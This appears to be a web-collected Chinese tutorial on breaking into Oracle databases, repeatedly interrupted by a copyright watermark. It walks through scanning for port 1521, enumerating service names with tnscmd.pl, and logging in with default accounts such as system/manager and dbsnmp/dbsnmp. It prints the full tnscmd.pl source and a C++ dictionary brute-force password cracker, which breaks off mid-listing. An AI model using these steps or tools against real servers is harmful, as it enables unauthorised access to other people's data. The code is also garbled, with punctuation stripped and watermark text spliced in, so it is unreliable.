入侵oracle数据库的一些心得

1、本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。入侵oracle数据库的一些心得信息来源：I.S.T.O信息安全团队( HYPERLINK /I_S_T_O /I_S_T_O)、先看下面的一个贴子:Oracle数据库是现在很流行的数据库系统，很多大型网站都采用Oracle，它之所以倍受用户喜爱是因为它有以下突出的特点:1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库，其大小可到几百千兆，可充分利用硬件设备。支持大量用户同时在同一数据上执行各种

2、数据应用，并使数据争用最小，保证数据一致性。系统维护具有高的性能，Oracle每天可连续24小时工作，正常的系统操作(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性，可在数据库级或在子数据库级上控制。2、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以它是一个开放系统，保护了用户的投资。美国标准化和技术研究所(NIST)对。acle7SERVER进行检验，100%地与ANSI/ISOSQL89标准的二级相兼容。3、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全性。Oracle实施数据完整性，为可接受的数据指

3、定标准。4、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络，允许将处理分为数据库服务器和客户应用程序，所有共享的数据管理由数据库管理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境，Oracle将存放在多台计算机上的数据组合成一个逻辑数据库，可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运行,以致Oracle上所开发的应用可移植到任何操作系统，只需很少修改或不需修改。Oracle本文档为网上收集，若侵犯了您的利益，请联系(QQ：

4、253169161)，我将立即核对删除。*软件同工业标准相兼容，包括很多工业标准的操作系统，所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。虽然Oracle数据库具有很高的安全性，但是如果我们在配置的时候不注意安全意识，那么也是很危险的。也就是说，安全最主要的还是要靠人自己，而不能过分依赖软件来实现。我们知道，在mssql中，安装完成后默认有个sa的登陆密码为空，如果不更改就会产生安全漏洞。那么oracle呢？也有的。为了安装和调试的方便，Oracle数据库中的两个具有DBA权限的用户Sys和System的缺省密码是manager

5、。笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码，其中也包括很多大型的电子商务网站，我们就可以利用这个缺省密码去找我们感兴趣的东西。如何实现，看下面的文章吧。进行测试前我们先来了解一些相关的知识，我们连接一个Oracle数据库的时候，需要知道它的service_name或者是Sid值，就象mssql一样，需要知道数据库名。那如何去知道呢，猜？呵呵，显然是不行的。这里我们先讲讲oracle的TNSlistener,它位于数据库Client和数据库Server之间，默认监听1521端口，这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话，ora

6、cle将不会返回它的banner,如果你输入一些东西的话，它甚至有可能把你踢出去。这里我们就需要用tnscmd.pl这个perl程序了，它可以查询远程oracle数据库是否开启(也就是ping了)，查询版本,以及查询它的服务名，服务状态和数据库服务名，而且正确率很高。理论方面的讲完了，如果还有什么不懂的可以去查找相关资料。现在开始测试吧，需要的工具有：ActivePerl.Oracle客户端，Superscan或者是其它扫描端口的软件，Tnscmd.pl。我们先用Superscan扫描开放了端口1521的主机，假设其IP是xx.xx.110.110，这样目标已经有了。然后我们要做的就是用Tns

7、cmd.pl来查询远程数据库的服务名了，Tnsc本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。md.pl的用法如下:C:peribinperltnscmd.plusage:tnscmd.plcommand-hhostnamewherecommandissomethinglikeping,version,status,etc.(defaultisping)-pport-alternateTCPporttouse(defaultis1521)-logfilelogf

8、ile-writerawpacketstospecifiedlogfile-indent-indent&outdentonparens-rawcmdcommand-buildyourownCONNECT_DATAstring-cmdsizebytes-fakeTNScommandsize(revealspacketleakage)我们下面用的只有简单的几个命令，其他的命令也很好用，一起去发掘吧。然后我们就这样来:C:perlbinperltnscmd.plservices-hxx.xx.110.110-p1521-ndentsending(CONNECT_DATA=(COMMAND=servi

9、ces)toxx.xx.110.110:1521writing91bytesreading6?本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。TMP=VSNNUM=135286784ERR=OSERVICES_EXIST=1QSERVICE=SERVICE_NAME=ORCLINSTANCE-INSTANCE_NAME=ORCLNUM=1INSTANCE_CLASS=ORACLEHANDLER-HANDLER_DISPLAY=DEDICATEDSERVERSTA=

10、readyHANDLER_INFO=LOCALSERVERHANDLER_MAXLOAD=0HANDLERLOAD=0REFUSED=OHANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227HANDLER_NAME=DEDICATEDADDRESS=PROTOCOL=beqPROGRAM=/home/oracle/bin/oracleENVS=ORACLE_HOME=/home/oracle,ORACLE_SID=ORCLARGV0=oracleORCLARGS=LOCAL=NO从上面得到的信息我们可以看出数据库的服务名为ORCL,然后我们就可以通过sql

11、plus工具来远程连上它了，用户名和密码我们用默认的system/manager或者是sys/manager,其他的如mdsys/mdsys，ctxsys/ctxsys等，这个默认用户和密码是随版本的不同而改变的。如下：C:oracleora90BINsqlplus/nologSQL*Plus:Release.1-ProductiononThuMay2311:36:592002(c)Copyright2001OracleCorporation.Allrightsreserved.SQLconnectsystem/manager(description=(address_list=(addres

12、s=(protocol=tcp)(host=xx.xx.110.110)(port=1521)(connect_data=(SERVICE_NAME=ORCL);如果密码正确，那么就会提示connected,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了，那我们只能换别的目标了。但是我发现很多都是不改的，这个就是安全意识的问题了。二、上面提到的两个小软件:tnscmd.plCopycode#!/usr/bin/perl#tnscmd-alametooltoprodtheoracletnslsnrprocess(1521

13、/tcp)testedunderLinuxx86&OpenBSDSparc+per15#Initialcruft: HYPERLINK mailto:jwa jwa5Oct2000#$Id:tnscmd,v1.32001/04/2606:45:48jwaExp$#seealso:/jwa/hacks/security/tnscmd/tnscmd-doc.html HYPERLINK /cgi-bin/cvename.cgi?name=CAN-2000-0818 /cgi-bin/cvename.cgi?name=CAN-2000-0818本文档为网上收集，若侵犯了您的利益，请联系(QQ：253

14、169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。/deploy/security/alerts.htm HYPERLINK /alerts/advise66.php /alerts/advise66.php#GPLd,ofcourse. HYPERLINK /copyleft/gpl.html /copyleft/gpl.html#$Log:tnscmd,v$Revision1.32001/04/2606:45:48jwatypo

15、inurl.whoops.#Revision1.22001/04/2606:42:17jwacompleterewrite-useIO:Socketinsteadoftcp_open-gotridofpdump()-putpacketintolistandbuilditwithpack()-added-indentoption#useIO:Socket;#processargumentsusestrict;#agrumpyperlinterpreterisyourfriendselect(STDOUT);$|=1;my($cmd)=$ARGVOif($ARGVO!/);my($arg);whi

16、le($arg=shiftARGV)$main:hostname=shiftARGVif($argeq-h);$main:port=shiftARGVif($argeq-p);$main:logfile=shiftARGVif($argeq-logfile);$main:fakepacketsize=shiftARGVif($argeq-packetsize);$main:fakecmdsize=shiftARGVif($argeq-cmdsize);$main:indent=1if($argeq-indent);$main:rawcmd=shiftARGVif($argeq-rawcmd);

17、$main:rawout=shiftARGVif($argeq-rawout);if($main:hostnameeq)printvv_EOF_;usage:$0command-hhostnamewherecommandissomethinglikeping,version,status,etc.(defaultisping)-pport-alternateTCPporttouse(defaultis1521)-logfilelogfile-writerawpacketstospecifiedlogfile-indent-indent&outdentonparens-rawcmdcommand

18、-buildyourownCONNECT_DATAstring-cmdsizebytes-fakeTNScommandsize(revealspacketleakage)exit(0);#withnocommands,defaulttopingingport1521$cmd=pingif($cmdeq);$main:port=1521if($main:porteq);#1541,1521.DBAsaresowhimsicalmainmy($command);if(defined($main:rawcmd)$command=$main:rawcmd;else$command=,(CONNECT_

19、DATA=(COMMAND=$cmd);my$response=tnscmd($command);viewtns($response);exit(0);#buildthepacket,openthesocket,sendthepacket,returntherespons本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。e#subtnscmdmy($command)=shift

20、_;my($packetlen,$cmdlen);my($clenH,$clenL,$plenH,$plenL);my($i);printsending$commandto$main:hostname:$main:portn;if($main:fakecmdsizene)$cmdlen=$main:fakecmdsize;printFakingcommandlengthto$cmdlenbytesn;else$cmdlen=length($command);$clenH=$cmdlen8;$clenL=$cmdlen&Oxff;#calculatepacketlengthif(defined(

21、$main:fakepacketsize)兴*printFakingpacketlengthto$main:fakepacketsizebytesn;$packetlen=$main:fakepacketsize;else$packetlen=length($command)+58;#preambleis58bytes$plenH=$packetlen8;$plenL=$packetlen&Oxff;$packetlen=length($command)+58if(defined($main:fakepacketsize);decimaloffset0:packetlen_highpacket

22、len_low26:cmdlen_highcmdlen_low58:commandthepacket.my(packet)=($plenH,$plenL,0 x00,0 x00,0 x01,0 x00,0 x00,0 x00,0 x01,0 x36,0 x01,0 x2c,0 x00,0 x00,0 x08,0 x00,0 x7f,0 xff,0 x7f,0 x08,0 x00,0 x00,0 x00,0 x01,$clenH,$clenL,0 x00,0 x3a,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00

23、,0 x00,0 x00,0 x00,0 x34,0 xe6,0 x00,0 x00,*芈0 x00,0 x01,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00,0 x00)；for($i=0;$ipush(packet,ord(substr($command,$i,1);my($sendbuf)=pack(C*,packet);printconnect;my($tns_sock)=IO:Socket:INET-new(PeerAddr=$main:hostname,PeerPort=$main:port,Proto=tcp,Type=SOCK_STREAM

24、,Timeout=30)|dieconnectto$main:hostnamefailure:$!;$tns_sock-autoflush(1);printrwriting.length($sendbuf).bytesn;if(defined($main:logfile)open(SEND,$main:logfile.send)|diecantwrite$main:logfile.send:printSEND$sendbuf|diewritetologfilefailed:$!;my($count)=syswrite($tns_sock,$sendbuf,length($sendbuf);if

25、($count!=length($sendbuf)printonlywrote$countbytes?!;exit1;printreadingn;getfundata1st12byteshavesomemeaningwhichsofareludesmeif(defined($main:logfile)open(REC,$main:logfile.rec)|diecantwrite$main:logfile.rec:$!;my($buf,$recvbuf);#readuntilsocketEOFwhile(sysread($tns_sock,$buf,128)printREC$bufif(def

26、ined($main:logfile);$recvbuf.=$buf;return$recvbuf;subviewtnsmy($response)=shift_;#shouldhaveahexdumpoption.if($main:raw)print$response;else$response=tr/200-377/000-177/;#striphighbits$response=tr/000-027/./;$response=tr/177/./;if($main:indent)parenify($response);elseMint$response;本文档为网上收集，若侵犯了您的利益，请

27、联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。printn;subparenifymy($buf)=shift_;my($i,$c);my($indent,$o_indent);for($i=0;$i$c=substr($buf,$i,1);$indent+if($ceq();$indent-if($ceq);if($indent!=$o_indent)printnunless(substr($buf,$i+1

28、,1)eq();printx$indent;$o_indent=$indent;undef$c;print$c;/*用链表实现的oracle密码暴破程序，需要在本地安装oralee*/#defineWIN32_LEAN_AND_MEAN#ifdefined(_WIN32)|defined(_WIN64)#include#include#endif#include#include#include#include#include#include#include#include#include#include#pragmacomment(lib,oraocci9.lib)链接到oraocci9.li

29、b库/#pragmacomment(lib,msvcrt.lib)#pragmacomment(lib,msvcprt.lib)链接到WS2_32丄IB库：#pragmacomment(lib,Ws2_32.lib)/#pragmacomment(lib,liboracle.lib)chartarget40=0;/目标服务器charport40=0;/SQL端口号兴*chardb40=0;数据库名定义链表：typedefstructPassNodeTCHARpassword1OO;structPassNode*Next;PassInfo;typedefstructNameNodeTCHARNa

30、me100;structNameNode*Next;NameInfo;定义Namelnfo来表示NameNode结构/函数SQLCheck功能:尝试用不同密码连接SQLServer,探测出正确的密码/DWORDWINAPISQLCheck(PVOIDpPwd,PVOIDuUserName)定义局部变量charszBuffer1025=0;char*pwd=NULL,*UserName=NULL;charDataBase255=0;/char*user=NULL;取得传递过来准备探测的密码pwd=(char*)pPwd;本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将

31、立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。7*垛乩来UserName=(char*)uUserName;DataBase=(char*)db;sprintf(DataBase,(description=(addressist=(address=(protocol=tcp)(host=%s)(port=%s)(connect_data=(SERVICE_NAME=%s),target,port,db);/printf(DataBase=%sn,DataBase);usingnamespacestd;usingnamespaceorac

32、le:occi;Environment*env=Environment:createEnvironment(Environment:DEFAULT);tryConnection*conn=env-createConnection(UserName,pwd,(char*)DataBase);if(conn)printf(n);coutSUCCESS-createConnectionendl;连接远程oracleServer数据库成功return1;elsecoutFAILURE-createConnectioncreateStatement(select*fromemp);ResultSet*r

33、set=stmt-executeQuery();本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。while(rset-next()coutvvtheempnois:vgetlnt(1)vcoutvvtheenameis:vgetString(2)v*/stmt-closeResultSet(rset);/conn-terminateStatement(stmt);env-terminateConnection(conn);catch(SQLExceptionex)/printf(n);coutvreturn0;Environment:terminate

34、Environment(env);return0;voidusage()printf(name:oraclepasswordcrackv1.0n);printf(author: HYPERLINK mailto:pt007vip.si pt007vip.sinn);fprintf(stdout,usage:oracle_pwd_crackipoptionsn);printf(options:nportspecifytheportoforaclenusernamespecifytheusernameoforaclen本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即

35、核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。*榮/t-ppasswordspecifythepasswordoforaclent-ddietspecifythedictionarynt-idatabasespecifythedatabasesnament-aautomodeautomaticcracktheoraclepasswordn/tNote:whenuusethe-aoption,namedtheusernamedictuser.dicn/tpassworddictpass.dicn);printf(nexample:oracle

36、_pwd_crack-x1521-usql_user.dic-dpass.dic-iPLSExtProcn);exit(1);创建密码链表：PassInfo*Create_Passink(intNodeNum,FILE*DictFile)/*readdatafrompassworddictionary,initthelink*/TCHAR*szTempPass=NULL;PassInfo*h,*p,*s;/*hpointtoheadnode,*ppointtotheprenode,*spointtothecurrentnode*/inti;/*counter*/分配内存空间在内存的动态存储区中

37、分配一块长度为sizeof(PassInfo)字节的连续区域,函数的返回值为该区域的首地址:if(h=(PassInfo*)malloc(sizeof(PassInfo)=NULL)fprintf(stderr,mallocfailed%d,GetLastError();exit(O);/*createtheheadnode*/*inittheheadnode*/h-Next=NULL;p=h;for(i=0;ipassword,0,100);fgets(szTempPass,100,DictFile);strncpy(s-password,szTempPass,strlen(szTempPa

38、ss)-1);s-Next=NULL;删除一个结点p-Next=s;链表指针指向下一个结构地址p=s;下一个结构的数据域赋值returnh;返回链表的头结点，它存放有第一个结点的首地址，没有数据创建用户名链表：NameInfo*Create_Name_link(intNodeNum,FILE*DictFile)/*readdatafrompassworddictionary,initthelink*/TCHAR*szTempName=NULL;NameInfo*h,*p,*s;/*hpointtoheadnode,*ppointtotheprenode,*spointtothecurrentn

39、ode*/inti;/*counter*/分配内存空间在内存的动态存储区中分配一块长度为sizeof(NameInfo)字节的连续区域，函数的返回值为该区域(此处为NameInfo结构的首地址)的首地址：if(h=(NameInfo*)malloc(sizeof(NameInfo)=NULL)fprintf(stdout,mallocfailed%d,GetLastError();exit(0);/*createtheheadnode*/*inittheheadnode*/h-Next=NULL;删除下一个结点p=h;/p里面目前指向头结点/按sizeof(TCHAR)的长度分配100块连续的

40、区域，并把指向TCHAR类型指针的首地址本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。赋予指针变量szTempPass:szTempName=(TCHAR*)calloc(100,sizeof(TCHAR);ZeroMemory(szTempName,100);/字符串类型变量清0if(s=(NameInfo*)malloc(sizeof(NameInfo)=NULL)fp

41、rintf(stdout,mallocfailed%d,GetLastError();exit(0);memset(s-Name,0,100);fgets(szTempName,100,DictFile);strncpy(s-Name,szTempName,strlen(szTempName)-1);s-Next=NULL;p-Next=s;/p指向下一个结点的地址p=s;下一个结构的数据域赋值free(szTempName);returnh;intLineCount(FILE*fd)返回字典中的密码数量intcountline=0;chardata100=0;/字符数组清0*while(fg

42、ets(data,100,fd)从指定的文件中读一个字符串到字符数组中countline+;rewind(fd);/指针返回到文件起始处returncountline;BOOLIsPortOpen(char*address,intport)intrecv=1;WSADATAwsadata;intfd;structsockaddr_inclientaddress;structhostent*host1;BOOLResult=FALSE;structtimevaltimer4;fd_setwritefd;检查数据是否可写ULONGvalue=1;初使化winsock版本1.1:recv=WSASt

43、artup(MAKEWORD(1,1),&wsadata);if(recv!=0)printf(initfailed%d.n,WSAGetLastError();兴*if(LOBYTE(wsadata.wVersion)!=1|HIBYTE(wsadata.wVersion)!=1)/*Telltheuserthatwecouldntfindauseable*/*winsock.dll.*/WSACleanup();return(0);创建socket套接字连接：fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);if(fdh_addr);timer4.tv_

44、sec=5;/以秒为单位指定等待时间timer4.tv_usec=0;FD_ZERO(&writefd);FD_SET(fd,&writefd);将套接字fd增添到writefd写集合中进行测试recv=connect(fd,(structsockaddr*)&clientaddress,sizeof(structsockaddr);if(FD_ISSET(fd,&writefd)recv=select(fd+1,NULL,&writefd,NULL,&timer4);测试5秒钟内是否有数据写入if(recv0)Result=TRUE;closesocket(fd);WSACleanup();

45、returnResult;intmain(intargc,char*argv)本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。*Q*NameInfo*headnode,*currnode=NULL;intnamecount=0,passcount=0;/dealwiththecommandline/参数不为8个的时候打印帮助if(argc!=10)usage。；if(argc=10)if(strcmpi(argv2,-x)usage();if(strcmpi(ar

46、gv4,-u)usage();if(strcmpi(argv6,-d)usage();if(strcmpi(argv8,-i)usage();本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。7/*determinatewhethertheoracleportisopen*/if(!IsPortOpen(argv1,atoi(argv3)printf(error:Cantconnectto%s:%dn,argv1,atoi(argv3);exit(O);/speci

47、fiytheusername/取得目标地址和端口号：strcpy(target,argv1);strcpy(port,argv3);strcpy(db,argv9);if(!strcmpi(argv4,-u)/*openthepassworddictionary*/FILE*passdic=NULL;if(passdic=fopen(argv7,r)=NULL)fprintf(stdout,Cantopenthepassworddictionaryn);Wexit(O);本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。*垛/*countlineofna

48、medictionary*/passcount=LineCount(passdic);计算密码的数量head=Create_Pass_link(passcount,passdic);/*createthepasswordlink*/curr=head-Next;指向第一个结点/*openthepassworddictionary*/FILE*Namedict=NULL;if(Namedict=fopen(argv5,r)=NULL)fprintf(stderr,Cantopenthenamedictionaryn);exit(0);/*密码最终保存文件*/FILE*passtxt=NULL;i

49、f(passtxt=fopen(pass.txt,at+)=NULL)fprintf(stdout,Cantwritepass.txtfile!n);exit(0);/*countlineofnamedictionary*/namecount=LineCount(Namedict);/计算用户名数量本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。本文档为网上收集，若侵犯了您的利益，请联系(QQ：253169161),我将立即核对删除。*求headnode=Create_Nameink(namecount,Namedict);/*createuserlink*/currnode=headnode-Next;intj=0,i=1;while(currnode!=NULL)/为NULL表示姓名链表结束printf(n开始第d位用户s测试:n,+j,currnode-Name);while(curr!=NULL)为NULL表示密码链表结束printf(Nowcracking%s-%sn,cu